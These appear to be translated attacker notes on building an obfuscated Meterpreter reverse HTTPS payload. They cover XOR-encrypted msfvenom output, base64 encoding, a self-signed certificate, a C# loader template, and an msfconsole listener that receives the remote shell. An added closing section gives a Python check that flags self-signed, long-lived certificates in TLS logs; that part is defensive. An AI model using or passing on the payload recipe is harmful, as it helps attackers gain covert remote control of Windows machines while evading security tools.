Some useful tools and a specific modus operandi to obfuscate a payload
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=<OurIPADRESS> LPORT=443 --encrypt xor --encrypt-key <helloworld> --format raw > testf
<helloworld> is the XOR key; we can choose whatever value we want.
hexdump -v -e '"\\""x" 1/1 "%02x" ""' <testf>
base64 <testf> > <newtest>
openssl req -newkey rsa:4096 \
-x509 \
-sha256 \
-days 3650 \
-nodes \
-out example.crt \
-keyout example.key
- Concatenate the two files into one
cat example.key example.crt > example.pem
- https://github.com/slyd0g/UrbanBishopLocal
On a Windows machine, install Git, .NET Core and VS Code; in VS Code, install the C# extension.
dotnet new console -o <nameofproject>
cd <nameofproject>
code . (opens Program.cs in VS Code directly)
--> In this step we copy the code from the Program.cs file in the UrbanBishopLocal folder. It is the template used to obfuscate our payload (just paste our base64 output at the end of Program.cs). We also set the same key that we defined in the msfvenom step.
dotnet build
If you want the build output as a single file instead, run:
dotnet publish -r win-x64 -c Release /p:PublishSingleFile=true
msfconsole
use exploit/multi/handler
set HandlerSSLCert </home/PATH/TO/THE/example.pem> (the PEM file we generated earlier)
set StagerVerifySSLCert true
set LHOST <ourIPADRESS>
set LPORT 443
exploit
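
Seen from the monitoring side, the certificate created above with openssl req -x509 -days 3650 is self-signed (issuer equals subject) and valid for ten years, and both properties show up in TLS certificate logs. The check below is an added example, not part of the original notes: it runs over constructed records that follow the field names of Zeek's x509.log JSON output, and the 825-day threshold and the "id" values are assumptions.

```python
import json

MAX_VALIDITY_DAYS = 825  # assumed threshold; tune to your environment

# Constructed sample records (all values made up for this example).
SAMPLE_LOG = """\
{"id": "F1", "certificate.subject": "CN=www.example.org", "certificate.issuer": "CN=Example CA R3", "certificate.not_valid_before": 1700000000.0, "certificate.not_valid_after": 1707776000.0}
{"id": "F2", "certificate.subject": "CN=host,O=Internet Widgits Pty Ltd", "certificate.issuer": "CN=host,O=Internet Widgits Pty Ltd", "certificate.not_valid_before": 1700000000.0, "certificate.not_valid_after": 2015360000.0}
{"id": "F3", "certificate.subject": "CN=printer.lan", "certificate.issuer": "CN=printer.lan", "certificate.not_valid_before": 1700000000.0, "certificate.not_valid_after": 1731536000.0}
"""

def assess(rec):
    """Return the reasons a certificate record looks ad hoc and self-signed."""
    reasons = []
    subject = rec.get("certificate.subject")
    if subject and subject == rec.get("certificate.issuer"):
        reasons.append("self-signed")
    try:
        seconds = rec["certificate.not_valid_after"] - rec["certificate.not_valid_before"]
    except (KeyError, TypeError):
        return reasons  # incomplete record: report only what could be checked
    days = seconds / 86400
    if days > MAX_VALIDITY_DAYS:
        reasons.append(f"validity {days:.0f} days")
    return reasons

def suspicious(log_text):
    """Return (id, reasons) for certificates that are self-signed AND long-lived."""
    hits = []
    for line in log_text.splitlines():
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed lines instead of aborting the scan
        if not isinstance(rec, dict):
            continue
        reasons = assess(rec)
        if len(reasons) == 2:
            hits.append((rec.get("id"), reasons))
    return hits

if __name__ == "__main__":
    for cert_id, reasons in suspicious(SAMPLE_LOG):
        print(cert_id, ", ".join(reasons))
```

Self-signed certificates are common on internal devices (record F3), so a hit is a lead to correlate with the destination and the process making the connection, not a verdict on its own.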